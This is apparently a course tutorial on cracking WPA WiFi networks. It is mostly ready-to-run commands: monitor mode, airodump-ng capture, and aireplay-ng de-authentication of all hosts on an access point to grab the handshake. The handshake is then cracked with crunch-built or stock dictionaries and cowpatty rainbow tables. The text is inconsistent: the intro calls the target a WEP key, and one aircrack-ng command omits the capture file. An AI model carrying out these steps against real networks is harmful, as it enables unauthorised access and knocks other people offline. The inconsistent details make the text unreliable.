How to crack WPA networks

This guide will show how to crack a WiFi network protected by a WEP key.

The steps are the following:

- 1. Run your network in monitor mode
- 2. Sniff traffic of AP
- 3. Send De-authentication packets in order to capture Handshake
- 4. Cracking network

Run network in monitor mode

- 1) Become administrator
 - a) \$sudo su
- 2) Stop network manager and create and put network card in monitor mode
 - a) \$/etc/init.d/network-manager stop
 - b) \$iw dev <<YOUR_NETWORK_CARD_NAME>> interface add wlan0mon type monitor

Sniff AP Traffic

- 1) If not present install aircrack-ng
 - a. \$sudo apt install aircrack-ng
- 2) As administrator run airodump-ng
 - a. \$airodump-ng wlan0mon
- 3) Look at the AP informations, like channel and bssid, will be useful later
- 4) Relaunch airodump-ng with more informations
 - a. \$airodump-ng -c <<N_CHANNEL>> --bssid <<YOUR_AP_MAC>> -w wpa_capture wlan0mon

Send De-authentication packets

Since this attack is based on capturing Handshake, we must stimulate the connection from hosts to the AP. So we will de-authenticate all hosts connected to the AP then waiting to their reconnection

- 1) Send De-authentication packages with aireplay-ng
 - a. \$aireplay-ng -0 2 -a <<YOUR_AP_MAC>> wlan0mon

With the option of aireplay-ng -0 using value 2 will allow the tool to send de-auth packets

Cracking network

For craking a WPA network we could use several ways. In this guide we will exploit two different ways:

- 1) Dictionary Attack
- 2) Rainbow table Attack

Dictionary Attack

In this kind of attack we try to find AP key, basically using a dictionary. We could use either already known dictionary, or simply self-created dictionary

Create Dictionary with crunch

In order to create a dictionary, we can use **crunch** tool

\$crunch <min_lenght> <max_lenght> charset [-t <pattern>] -o output

Example of crunch with minimum password length of 5 char and maximum length of 8 char, with lowercase charset:

\$crunch 5 8 qwertyuiopasdfghjklzxcvbnm -o dictionary.txt

We can also use a pattern for password creation, example if we know that the password has length of 6 character and also, we know that the password starts with letter "b" we can exploit this information for dictionary generation:

\$crunch 6 6 qwertyuiopasdfghjklzxcvbnm -t b@@@@@ -o dictionary

The generated passwords starting with b and will have length of 6 characters!

Using dictionary for cracking

As already said, we can use any kind of password's dictionary in order to find the password. For this purpose, we will use aircrack-ng

\$aircrack-ng -w <your_dictionary> capture_file.cap

Online there are some already known dictionary, like john the ripper.

In order to use this dictionary, we must install the package

\$sudo apt install john

Then using with cracking, example:

\$aircrack-ng -w /usr/share/john/password.lst

N.B. In Kali linux there is another dictionary, called rockyou.

The path of this dictionary is /usr/share/wordlists/rockyou.txt.gz

Rainbow Table attack

A Rainbow Table attack is an attack on the WPA handshake that will find the **PSK.** This kind of attack is way faster than the dictionary-based attack.

On internet there are some rainbow table, for already known SSIDs. Some example could be found here: https://www.renderlab.net/projects/WPA-tables/

To perform this attack, we will use **cowpatty** tool, if you are using a linux distribution not based on Debian you could find a script "**install cowpatty ubuntu.sh**" on course website to install it.

We can use cowpatty with the following command

\$cowpatty -d <<rainbow_table>> -r <<capture_file>> -s <<NETWORK_SSID>> -2

Generate rainbow table

Using **genpmk** (a cowpatty tool) we can build a custom rainbow table based on a dictionary. For the generation of this rainbow table we can even use a self-build dictionary.

\$genpmk -f <<our_dictionary>> -s <<NETWORK_SSID>> -d <<output_rainbow_table>>